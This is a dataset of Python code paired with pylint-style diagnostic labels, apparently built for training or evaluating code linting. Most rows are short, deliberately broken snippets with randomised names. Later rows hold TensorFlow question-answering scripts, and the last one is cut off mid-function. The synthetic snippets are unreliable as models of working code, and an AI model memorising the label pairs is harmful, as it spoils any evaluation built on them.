code
stringlengths
20
13.2k
label
stringlengths
21
6.26k
1 datetime = 1 2 3 def foo(): 4 global v 5 print(BaseClass) 6 BaseClass = 10 7 print(BaseClass) 8 val() 9 print(datetime)
5 - error: global-variable-undefined
1 nearest_int = 1 2 3 def foo(): 4 global v 5 print(fh) 6 fh = 10 7 print(fh) 8 v1() 9 print(nearest_int)
5 - error: global-variable-undefined
1 np = 1 2 3 def foo(): 4 global v 5 print(NANOSECONDS) 6 NANOSECONDS = 10 7 print(NANOSECONDS) 8 np() 9 print(np)
5 - error: global-variable-undefined
1 skip = 1 2 3 def foo(): 4 global v 5 print(start) 6 start = 10 7 print(start) 8 foo() 9 print(skip)
5 - error: global-variable-undefined
1 na_rm = 1 2 3 def foo(): 4 global v 5 print(v1) 6 v1 = 10 7 print(v1) 8 breaks_() 9 print(na_rm)
5 - error: global-variable-undefined
1 nearest_int = 1 2 3 def foo(): 4 global v 5 print(data) 6 data = 10 7 print(data) 8 i() 9 print(nearest_int)
5 - error: global-variable-undefined
1 MSG = 1 2 3 def foo(): 4 global v 5 print(log_format) 6 log_format = 10 7 print(log_format) 8 cdists() 9 print(MSG)
5 - error: global-variable-undefined
1 cdists = 1 2 3 def foo(): 4 global v 5 print(ABC) 6 ABC = 10 7 print(ABC) 8 v1_to_v2_map() 9 print(cdists)
5 - error: global-variable-undefined
1 types = 1 2 3 def foo(): 4 global v 5 print(transform) 6 transform = 10 7 print(transform) 8 trans() 9 print(types)
5 - error: global-variable-undefined
1 nearest_int = 1 2 3 def foo(): 4 global v 5 print(sys) 6 sys = 10 7 print(sys) 8 date_format() 9 print(nearest_int)
5 - error: global-variable-undefined
1 k = 1 2 3 def foo(): 4 global v 5 print(reduce) 6 reduce = 10 7 print(reduce) 8 x() 9 print(k)
5 - error: global-variable-undefined
1 x = 1 2 3 def foo(): 4 global v 5 print(d) 6 d = 10 7 print(d) 8 n() 9 print(x)
5 - error: global-variable-undefined
1 nomatch = 1 2 3 def foo(): 4 global v 5 print(probability_trans) 6 probability_trans = 10 7 print(probability_trans) 8 log_breaks() 9 print(nomatch)
5 - error: global-variable-undefined
1 limits = 1 2 3 def foo(): 4 global v 5 print(d) 6 d = 10 7 print(d) 8 sys() 9 print(limits)
5 - error: global-variable-undefined
1 pd = 1 2 3 def foo(): 4 global v 5 print(v) 6 v = 10 7 print(v) 8 i() 9 print(pd)
5 - error: global-variable-undefined
1 c = 1 2 3 def foo(): 4 global v 5 print(func) 6 func = 10 7 print(func) 8 dmin() 9 print(c)
5 - error: global-variable-undefined
1 self = 1 2 3 def foo(): 4 global v 5 print(incomparables) 6 incomparables = 10 7 print(incomparables) 8 SECONDS() 9 print(self)
5 - error: global-variable-undefined
1 item = 1 2 3 def foo(): 4 global v 5 print(Iterator) 6 Iterator = 10 7 print(Iterator) 8 OrderedDict() 9 print(item)
5 - error: global-variable-undefined
1 log2_trans = 1 2 3 def foo(): 4 global v 5 print(DISCRETE_KINDS) 6 DISCRETE_KINDS = 10 7 print(DISCRETE_KINDS) 8 Iterator() 9 print(log2_trans)
5 - error: global-variable-undefined
1 num2date = 1 2 3 def foo(): 4 global v 5 print(np) 6 np = 10 7 print(np) 8 name() 9 print(num2date)
5 - error: global-variable-undefined
1 doc = 1 2 3 def foo(): 4 global v 5 print(cdists) 6 cdists = 10 7 print(cdists) 8 aesthetic() 9 print(doc)
5 - error: global-variable-undefined
1 BaseClass = 1 2 3 def foo(): 4 global v 5 print(n) 6 n = 10 7 print(n) 8 msg() 9 print(BaseClass)
5 - error: global-variable-undefined
1 log10_trans = 1 2 3 def foo(): 4 global v 5 print(trans) 6 trans = 10 7 print(trans) 8 a() 9 print(log10_trans)
5 - error: global-variable-undefined
1 probability_trans = 1 2 3 def foo(): 4 global v 5 print(probability_trans) 6 probability_trans = 10 7 print(probability_trans) 8 BaseClass() 9 print(probability_trans)
5 - error: global-variable-undefined
1 lru_cache = 1 2 3 def foo(): 4 global v 5 print(ABC) 6 ABC = 10 7 print(ABC) 8 doc() 9 print(lru_cache)
5 - error: global-variable-undefined
1 ABC = 1 2 3 def foo(): 4 global v 5 print(tz) 6 tz = 10 7 print(tz) 8 ABC() 9 print(ABC)
5 - error: global-variable-undefined
1 MethodType = 1 2 3 def foo(): 4 global v 5 print(klass_name) 6 klass_name = 10 7 print(klass_name) 8 vmax() 9 print(MethodType)
5 - error: global-variable-undefined
1 log10_trans = 1 2 3 def foo(): 4 global v 5 print(name) 6 name = 10 7 print(name) 8 NANOSECONDS() 9 print(log10_trans)
5 - error: global-variable-undefined
1 name = 1 2 3 def foo(): 4 global v 5 print(aesthetic) 6 aesthetic = 10 7 print(aesthetic) 8 current_date() 9 print(name)
5 - error: global-variable-undefined
1 import datetime 2 3 current_date: str = datetime.date.today().strftime("%y-%m-%d") 4 DISCRETE_KINDS = 1 5 6 def foo(): 7 global v 8 print(pd) 9 pd = 10 10 print(pd) 11 num2date() 12 print(DISCRETE_KINDS) 13 import datetime 14 na_rm: str = i.date.today().strftime('%y-%m-%d')
8 - error: global-variable-undefined
1 import datetime 2 na_rm: str = i.date.today().strftime('%y-%m-%d') 3 dataspace_is_numerical = 1 4 5 def foo(): 6 global v 7 print(v1) 8 v1 = 10 9 print(v1) 10 obj() 11 print(dataspace_is_numerical) 12 import datetime 13 incomparables: str = skip.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 incomparables: str = skip.date.today().strftime('%y-%m-%d') 3 v1_to_v2_map = 1 4 5 def foo(): 6 global v 7 print(bar) 8 bar = 10 9 print(bar) 10 y() 11 print(v1_to_v2_map) 12 import datetime 13 attr: str = minor_breaks.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 attr: str = minor_breaks.date.today().strftime('%y-%m-%d') 3 incomparables = 1 4 5 def foo(): 6 global v 7 print(func) 8 func = 10 9 print(func) 10 n() 11 print(incomparables) 12 import datetime 13 inverse: str = OrderedDict.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 inverse: str = OrderedDict.date.today().strftime('%y-%m-%d') 3 minor_breaks = 1 4 5 def foo(): 6 global v 7 print(timedelta_format) 8 timedelta_format = 10 9 print(timedelta_format) 10 mpl_format() 11 print(minor_breaks) 12 import datetime 13 obj: str = d.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 obj: str = d.date.today().strftime('%y-%m-%d') 3 NANOSECONDS = 1 4 5 def foo(): 6 global v 7 print(_x) 8 _x = 10 9 print(_x) 10 name() 11 print(NANOSECONDS) 12 import datetime 13 probability_trans: str = obj.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 probability_trans: str = obj.date.today().strftime('%y-%m-%d') 3 f = 1 4 5 def foo(): 6 global v 7 print(value) 8 value = 10 9 print(value) 10 datetime() 11 print(f) 12 import datetime 13 v2: str = args.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 v2: str = args.date.today().strftime('%y-%m-%d') 3 contents = 1 4 5 def foo(): 6 global v 7 print(item) 8 item = 10 9 print(item) 10 t() 11 print(contents) 12 import datetime 13 log10_trans: str = incomparables.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 log10_trans: str = incomparables.date.today().strftime('%y-%m-%d') 3 doc = 1 4 5 def foo(): 6 global v 7 print(nearest_int) 8 nearest_int = 10 9 print(nearest_int) 10 i() 11 print(doc) 12 import datetime 13 na_rm: str = doc.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 na_rm: str = doc.date.today().strftime('%y-%m-%d') 3 _get = 1 4 5 def foo(): 6 global v 7 print(t) 8 t = 10 9 print(t) 10 ABC() 11 print(_get) 12 import datetime 13 v1: str = log_format.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 v1: str = log_format.date.today().strftime('%y-%m-%d') 3 accuracy = 1 4 5 def foo(): 6 global v 7 print(i) 8 i = 10 9 print(i) 10 breaks_() 11 print(accuracy) 12 import datetime 13 v2: str = c.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 v2: str = c.date.today().strftime('%y-%m-%d') 3 MethodType = 1 4 5 def foo(): 6 global v 7 print(self) 8 self = 10 9 print(self) 10 nearest_int() 11 print(MethodType) 12 import datetime 13 func: str = v1.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 func: str = v1.date.today().strftime('%y-%m-%d') 3 v1_to_v2_map = 1 4 5 def foo(): 6 global v 7 print(na_rm) 8 na_rm = 10 9 print(na_rm) 10 x() 11 print(v1_to_v2_map) 12 import datetime 13 v: str = contents.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 v: str = contents.date.today().strftime('%y-%m-%d') 3 trans = 1 4 5 def foo(): 6 global v 7 print(log_trans) 8 log_trans = 10 9 print(log_trans) 10 probit_trans() 11 print(trans) 12 import datetime 13 c: str = transform.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 import datetime 2 c: str = transform.date.today().strftime('%y-%m-%d') 3 y = 1 4 5 def foo(): 6 global v 7 print(log_format) 8 log_format = 10 9 print(log_format) 10 v2() 11 print(y) 12 import datetime 13 reduce: str = BaseClass.date.today().strftime('%y-%m-%d')
7 - error: global-variable-undefined
1 2 import data_helper 3 import time 4 import datetime 5 import os 6 import tensorflow as tf 7 8 import numpy as np 9 import evaluation 10 now = int(time.time()) 11 12 timeArray = time.localtime(now) 13 timeStamp = time.strftime("%Y%m%d%H%M%S", timeArray) 14 timeDay = time.strftime("%Y%m%d", timeArray) 15 print (timeStamp) 16 17 def main(args): 18 args._parse_flags() 19 print("\nParameters:") 20 for attr, value in sorted(args.__flags.items()): 21 print(("{}={}".format(attr.upper(), value))) 22 log_dir = 'log/'+ timeDay 23 if not os.path.exists(log_dir): 24 os.makedirs(log_dir) 25 data_file = log_dir + '/test_' + args.data + timeStamp 26 precision = data_file + 'precise' 27 print('load data ...........') 28 train,test,dev = data_helper.load(args.data,filter = args.clean) 29 30 q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split())) 31 a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split())) 32 33 alphabet = data_helper.get_alphabet([train,test,dev]) 34 print('the number of words',len(alphabet)) 35 36 print('get embedding') 37 if args.data=="quora": 38 embedding = data_helper.get_embedding(alphabet,language="cn") 39 else: 40 embedding = data_helper.get_embedding(alphabet) 41 42 43 44 with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)): 45 # with tf.device("/cpu:0"): 46 session_conf = tf.ConfigProto() 47 session_conf.allow_soft_placement = args.allow_soft_placement 48 session_conf.log_device_placement = args.log_device_placement 49 session_conf.gpu_options.allow_growth = True 50 sess = tf.Session(config=session_conf) 51 52 model = QA_CNN_extend(max_input_left = q_max_sent_length, 53 max_input_right = a_max_sent_length, 54 batch_size = args.batch_size, 55 vocab_size = len(alphabet), 56 embedding_size = args.embedding_dim, 57 filter_sizes = list(map(int, args.filter_sizes.split(","))), 58 num_filters = args.num_filters, 59 hidden_size = args.hidden_size, 60 dropout_keep_prob = args.dropout_keep_prob, 61 embeddings = embedding, 62 l2_reg_lambda = args.l2_reg_lambda, 63 trainable = args.trainable, 64 pooling = args.pooling, 65 conv = args.conv) 66 67 model.build_graph() 68 69 sess.run(tf.global_variables_initializer()) 70 def train_step(model,sess,batch): 71 for data in batch: 72 feed_dict = { 73 model.question:data[0], 74 model.answer:data[1], 75 model.answer_negative:data[2], 76 model.q_mask:data[3], 77 model.a_mask:data[4], 78 model.a_neg_mask:data[5] 79 80 } 81 _, summary, step, loss, accuracy,score12, score13, see = sess.run( 82 [model.train_op, model.merged,model.global_step,model.loss, model.accuracy,model.score12,model.score13, model.see], 83 feed_dict) 84 time_str = datetime.datetime.now().isoformat() 85 print("{}: step {}, loss {:g}, acc {:g} ,positive {:g},negative {:g}".format(time_str, step, loss, accuracy,np.mean(score12),np.mean(score13))) 86 def predict(model,sess,batch,test): 87 scores = [] 88 for data in batch: 89 feed_dict = { 90 model.question:data[0], 91 model.answer:data[1], 92 model.q_mask:data[2], 93 model.a_mask:data[3] 94 95 } 96 score = sess.run( 97 model.score12, 98 feed_dict) 99 scores.extend(score) 100 101 return np.array(scores[:len(test)]) 102 103 104 105 106 107 for i in range(args.num_epoches): 108 datas = data_helper.get_mini_batch(train,alphabet,args.batch_size) 109 train_step(model,sess,datas) 110 test_datas = data_helper.get_mini_batch_test(test,alphabet,args.batch_size) 111 112 predicted_test = predict(model,sess,test_datas,test) 113 print(len(predicted_test)) 114 print(len(test)) 115 map_mrr_test = evaluation.evaluationBypandas(test,predicted_test) 116 117 print('map_mrr test',map_mrr_test) 118 119 120 121 122 123 124 125 126
17 - refactor: too-many-locals 18 - warning: protected-access 20 - warning: protected-access 30 - warning: unnecessary-lambda 31 - warning: unnecessary-lambda 52 - error: undefined-variable 81 - warning: unused-variable 81 - warning: unused-variable 26 - warning: unused-variable 107 - warning: unused-variable
1 class Singleton(object): 2 __instance=None 3 def __init__(self): 4 pass 5 def getInstance(self): 6 if Singleton.__instance is None: 7 # Singleton.__instance=object.__new__(cls,*args,**kwd) 8 Singleton.__instance=self.get_test_flag() 9 print("build FLAGS over") 10 return Singleton.__instance 11 def get_test_flag(self): 12 import tensorflow as tf 13 flags = tf.app.flags 14 if len(flags.FLAGS.__dict__.keys())<=2: 15 16 flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)") 17 flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')") 18 flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)") 19 flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)") 20 flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)") 21 flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)") 22 flags.DEFINE_integer("max_len_left", 40, "max document length of left input") 23 flags.DEFINE_integer("max_len_right", 40, "max document length of right input") 24 flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)") 25 flags.DEFINE_integer("hidden_size",100,"the default hidden size") 26 flags.DEFINE_string("model_name", "cnn", "cnn or rnn") 27 28 # Training parameters 29 flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)") 30 flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)") 31 flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)") 32 flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)") 33 flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)") 34 35 flags.DEFINE_string('data','wiki','data set') 36 flags.DEFINE_string('pooling','max','max pooling or attentive pooling') 37 flags.DEFINE_boolean('clean',True,'whether we clean the data') 38 flags.DEFINE_string('conv','wide','wide conv or narrow') 39 flags.DEFINE_integer('gpu',0,'gpu number') 40 # Misc Parameters 41 flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement") 42 flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices") 43 return flags.FLAGS 44 def get_rnn_flag(self): 45 import tensorflow as tf 46 flags = tf.app.flags 47 if len(flags.FLAGS.__dict__.keys())<=2: 48 49 flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)") 50 flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')") 51 flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)") 52 flags.DEFINE_float("dropout_keep_prob", 1, "Dropout keep probability (default: 0.5)") 53 flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)") 54 flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)") 55 flags.DEFINE_integer("max_len_left", 40, "max document length of left input") 56 flags.DEFINE_integer("max_len_right", 40, "max document length of right input") 57 flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)") 58 flags.DEFINE_integer("hidden_size",100,"the default hidden size") 59 flags.DEFINE_string("model_name", "rnn", "cnn or rnn") 60 61 # Training parameters 62 flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)") 63 flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)") 64 flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)") 65 flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)") 66 flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)") 67 68 69 # flags.DEFINE_string('data','8008','data set') 70 71 flags.DEFINE_string('data','trec','data set') 72 73 flags.DEFINE_string('pooling','max','max pooling or attentive pooling') 74 flags.DEFINE_boolean('clean',False,'whether we clean the data') 75 flags.DEFINE_string('conv','wide','wide conv or narrow') 76 flags.DEFINE_integer('gpu',0,'gpu number') 77 # Misc Parameters 78 flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement") 79 flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices") 80 return flags.FLAGS 81 def get_cnn_flag(self): 82 import tensorflow as tf 83 flags = tf.app.flags 84 if len(flags.FLAGS.__dict__.keys())<=2: 85 86 flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)") 87 flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')") 88 flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)") 89 flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)") 90 flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)") 91 flags.DEFINE_float("learning_rate", 5e-3, "learn rate( default: 0.0)") 92 flags.DEFINE_integer("max_len_left", 40, "max document length of left input") 93 flags.DEFINE_integer("max_len_right", 40, "max document length of right input") 94 flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)") 95 flags.DEFINE_integer("hidden_size",100,"the default hidden size") 96 flags.DEFINE_string("model_name", "cnn", "cnn or rnn") 97 98 # Training parameters 99 flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)") 100 flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)") 101 flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)") 102 flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)") 103 flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)") 104 105 flags.DEFINE_string('data','wiki','data set') 106 flags.DEFINE_string('pooling','max','max pooling or attentive pooling') 107 flags.DEFINE_boolean('clean',True,'whether we clean the data') 108 flags.DEFINE_string('conv','wide','wide conv or narrow') 109 flags.DEFINE_integer('gpu',0,'gpu number') 110 # Misc Parameters 111 flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement") 112 flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices") 113 return flags.FLAGS 114 115 116 def get_qcnn_flag(self): 117 118 import tensorflow as tf 119 flags = tf.app.flags 120 if len(flags.FLAGS.__dict__.keys())<=2: 121 122 123 flags.DEFINE_integer("embedding_size",300, "Dimensionality of character embedding (default: 128)") 124 flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')") 125 flags.DEFINE_integer("num_filters", 128, "Number of filters per filter size (default: 128)") 126 flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)") 127 flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)") 128 flags.DEFINE_float("learning_rate", 0.001, "learn rate( default: 0.0)") 129 130 flags.DEFINE_integer("max_len_left", 40, "max document length of left input") 131 flags.DEFINE_integer("max_len_right", 40, "max document length of right input") 132 flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)") 133 flags.DEFINE_integer("hidden_size",100,"the default hidden size") 134 135 flags.DEFINE_string("model_name", "qcnn", "cnn or rnn") 136 137 138 # Training parameters 139 flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)") 140 flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)") 141 flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)") 142 flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)") 143 flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)") 144 145 146 flags.DEFINE_string('data','wiki','data set') 147 flags.DEFINE_string('pooling','mean','max pooling or attentive pooling') 148 149 flags.DEFINE_boolean('clean',True,'whether we clean the data') 150 flags.DEFINE_string('conv','wide','wide conv or narrow') 151 flags.DEFINE_integer('gpu',0,'gpu number') 152 # Misc Parameters 153 flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement") 154 flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices") 155 return flags.FLAGS 156 157 def get_8008_flag(self): 158 import tensorflow as tf 159 flags = tf.app.flags 160 if len(flags.FLAGS.__dict__.keys())<=2: 161 162 flags.DEFINE_integer("embedding_size",200, "Dimensionality of character embedding (default: 128)") 163 flags.DEFINE_string("filter_sizes", "1,2,3,5", "Comma-separated filter sizes (default: '3,4,5')") 164 flags.DEFINE_integer("num_filters", 64, "Number of filters per filter size (default: 128)") 165 flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)") 166 flags.DEFINE_float("l2_reg_lambda", 0.000001, "L2 regularizaion lambda (default: 0.0)") 167 flags.DEFINE_float("learning_rate", 1e-3, "learn rate( default: 0.0)") 168 flags.DEFINE_integer("max_len_left", 40, "max document length of left input") 169 flags.DEFINE_integer("max_len_right", 40, "max document length of right input") 170 flags.DEFINE_string("loss","pair_wise","loss function (default:point_wise)") 171 flags.DEFINE_integer("hidden_size",100,"the default hidden size") 172 flags.DEFINE_string("model_name", "rnn", "cnn or rnn") 173 174 # Training parameters 175 flags.DEFINE_integer("batch_size", 250, "Batch Size (default: 64)") 176 flags.DEFINE_boolean("trainable", False, "is embedding trainable? (default: False)") 177 flags.DEFINE_integer("num_epoches", 1000, "Number of training epochs (default: 200)") 178 flags.DEFINE_integer("evaluate_every", 500, "Evaluate model on dev set after this many steps (default: 100)") 179 flags.DEFINE_integer("checkpoint_every", 500, "Save model after this many steps (default: 100)") 180 181 flags.DEFINE_string('data','8008','data set') 182 flags.DEFINE_string('pooling','max','max pooling or attentive pooling') 183 flags.DEFINE_boolean('clean',False,'whether we clean the data') 184 flags.DEFINE_string('conv','wide','wide conv or narrow') 185 flags.DEFINE_integer('gpu',0,'gpu number') 186 # Misc Parameters 187 flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement") 188 flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices") 189 return flags.FLAGS 190 191 192 193 194 if __name__=="__main__": 195 args=Singleton().get_test_flag() 196 for attr, value in sorted(args.__flags.items()): 197 print(("{}={}".format(attr.upper(), value))) 198
1 - refactor: useless-object-inheritance 196 - warning: protected-access
1 # -*- coding: utf-8 -*- 2 3 from tensorflow import flags 4 import tensorflow as tf 5 from config import Singleton 6 import data_helper 7 8 import datetime 9 import os 10 import models 11 import numpy as np 12 import evaluation 13 14 from data_helper import log_time_delta,getLogger 15 16 logger=getLogger() 17 18 19 20 args = Singleton().get_rnn_flag() 21 #args = Singleton().get_8008_flag() 22 23 args._parse_flags() 24 opts=dict() 25 logger.info("\nParameters:") 26 for attr, value in sorted(args.__flags.items()): 27 logger.info(("{}={}".format(attr.upper(), value))) 28 opts[attr]=value 29 30 31 train,test,dev = data_helper.load(args.data,filter = args.clean) 32 33 q_max_sent_length = max(map(lambda x:len(x),train['question'].str.split())) 34 a_max_sent_length = max(map(lambda x:len(x),train['answer'].str.split())) 35 36 alphabet = data_helper.get_alphabet([train,test,dev],dataset=args.data ) 37 logger.info('the number of words :%d '%len(alphabet)) 38 39 if args.data=="quora" or args.data=="8008" : 40 print("cn embedding") 41 embedding = data_helper.get_embedding(alphabet,dim=200,language="cn",dataset=args.data ) 42 train_data_loader = data_helper.getBatch48008 43 else: 44 embedding = data_helper.get_embedding(alphabet,dim=300,dataset=args.data ) 45 train_data_loader = data_helper.get_mini_batch 46 opts["embeddings"] =embedding 47 opts["vocab_size"]=len(alphabet) 48 opts["max_input_right"]=a_max_sent_length 49 opts["max_input_left"]=q_max_sent_length 50 opts["filter_sizes"]=list(map(int, args.filter_sizes.split(","))) 51 52 print("innitilize over") 53 54 55 56 57 #with tf.Graph().as_default(), tf.device("/gpu:" + str(args.gpu)): 58 with tf.Graph().as_default(): 59 # with tf.device("/cpu:0"): 60 session_conf = tf.ConfigProto() 61 session_conf.allow_soft_placement = args.allow_soft_placement 62 session_conf.log_device_placement = args.log_device_placement 63 session_conf.gpu_options.allow_growth = True 64 sess = tf.Session(config=session_conf) 65 model=models.setup(opts) 66 model.build_graph() 67 saver = tf.train.Saver() 68 sess.run(tf.global_variables_initializer()) # fun first than print or save 69 70 71 ckpt = tf.train.get_checkpoint_state("checkpoint") 72 if ckpt and ckpt.model_checkpoint_path: 73 # Restores from checkpoint 74 saver.restore(sess, ckpt.model_checkpoint_path) 75 print(sess.run(model.position_embedding)[0]) 76 if os.path.exists("model") : 77 import shutil 78 shutil.rmtree("model") 79 builder = tf.saved_model.builder.SavedModelBuilder("./model") 80 builder.add_meta_graph_and_variables(sess, [tf.saved_model.tag_constants.SERVING]) 81 builder.save(True) 82 variable_averages = tf.train.ExponentialMovingAverage( model) 83 variables_to_restore = variable_averages.variables_to_restore() 84 saver = tf.train.Saver(variables_to_restore) 85 for name in variables_to_restore: 86 print(name) 87 88 @log_time_delta 89 def predict(model,sess,batch,test): 90 scores = [] 91 for data in batch: 92 score = model.predict(sess,data) 93 scores.extend(score) 94 return np.array(scores[:len(test)]) 95 96 97 text = "怎么 提取 公积金 ?" 98 99 splited_text=data_helper.encode_to_split(text,alphabet) 100 101 mb_q,mb_q_mask = data_helper.prepare_data([splited_text]) 102 mb_a,mb_a_mask = data_helper.prepare_data([splited_text]) 103 104 data = (mb_q,mb_a,mb_q_mask,mb_a_mask) 105 score = model.predict(sess,data) 106 print(score) 107 feed_dict = { 108 model.question:data[0], 109 model.answer:data[1], 110 model.q_mask:data[2], 111 model.a_mask:data[3], 112 model.dropout_keep_prob_holder:1.0 113 } 114 sess.run(model.position_embedding,feed_dict=feed_dict)[0] 115 116 117
23 - warning: protected-access 24 - refactor: use-dict-literal 26 - warning: protected-access 33 - warning: unnecessary-lambda 34 - warning: unnecessary-lambda 39 - refactor: consider-using-in 89 - warning: redefined-outer-name 89 - warning: redefined-outer-name 89 - warning: redefined-outer-name 91 - warning: redefined-outer-name 92 - warning: redefined-outer-name 114 - warning: expression-not-assigned 3 - warning: unused-import 8 - warning: unused-import 12 - warning: unused-import
1 from .QA_CNN_pairwise import QA_CNN_extend as CNN 2 from .QA_RNN_pairwise import QA_RNN_extend as RNN 3 from .QA_CNN_quantum_pairwise import QA_CNN_extend as QCNN 4 def setup(opt): 5 if opt["model_name"]=="cnn": 6 model=CNN(opt) 7 elif opt["model_name"]=="rnn": 8 model=RNN(opt) 9 elif opt['model_name']=='qcnn': 10 model=QCNN(opt) 11 else: 12 print("no model") 13 exit(0) 14 return model
5 - warning: bad-indentation 6 - warning: bad-indentation 7 - warning: bad-indentation 8 - warning: bad-indentation 9 - warning: bad-indentation 10 - warning: bad-indentation 11 - warning: bad-indentation 12 - warning: bad-indentation 13 - warning: bad-indentation 14 - warning: bad-indentation 1 - error: relative-beyond-top-level 2 - error: relative-beyond-top-level 3 - error: relative-beyond-top-level 13 - refactor: consider-using-sys-exit
1 from my.general import flatten, reconstruct, add_wd, exp_mask 2 3 import numpy as np 4 import tensorflow as tf 5 6 _BIAS_VARIABLE_NAME = "bias" 7 _WEIGHTS_VARIABLE_NAME = "kernel" 8 9 10 11 def linear(args, output_size, bias, bias_start=0.0, scope=None, squeeze=False, wd=0.0, input_keep_prob=1.0, 12 is_train=None):#, name_w='', name_b='' 13 # if args is None or (nest.is_sequence(args) and not args): 14 # raise ValueError("`args` must be specified") 15 # if not nest.is_sequence(args): 16 # args = [args] 17 18 flat_args = [flatten(arg, 1) for arg in args]#[210,20] 19 20 # if input_keep_prob < 1.0: 21 # assert is_train is not None 22 flat_args = [tf.nn.dropout(arg, input_keep_prob) for arg in flat_args] 23 24 total_arg_size = 0#[60] 25 shapes = [a.get_shape() for a in flat_args] 26 for shape in shapes: 27 if shape.ndims != 2: 28 raise ValueError("linear is expecting 2D arguments: %s" % shapes) 29 if shape[1].value is None: 30 raise ValueError("linear expects shape[1] to be provided for shape %s, " 31 "but saw %s" % (shape, shape[1])) 32 else: 33 total_arg_size += shape[1].value 34 # print(total_arg_size) 35 # exit() 36 dtype = [a.dtype for a in flat_args][0] 37 38 # scope = tf.get_variable_scope() 39 with tf.variable_scope(scope) as outer_scope: 40 weights = tf.get_variable(_WEIGHTS_VARIABLE_NAME, [total_arg_size, output_size], dtype=dtype) 41 if len(flat_args) == 1: 42 res = tf.matmul(flat_args[0], weights) 43 else: 44 res = tf.matmul(tf.concat(flat_args, 1), weights) 45 if not bias: 46 flat_out = res 47 else: 48 with tf.variable_scope(outer_scope) as inner_scope: 49 inner_scope.set_partitioner(None) 50 biases = tf.get_variable( 51 _BIAS_VARIABLE_NAME, [output_size], 52 dtype=dtype, 53 initializer=tf.constant_initializer(bias_start, dtype=dtype)) 54 flat_out = tf.nn.bias_add(res, biases) 55 56 out = reconstruct(flat_out, args[0], 1) 57 58 if squeeze: 59 out = tf.squeeze(out, 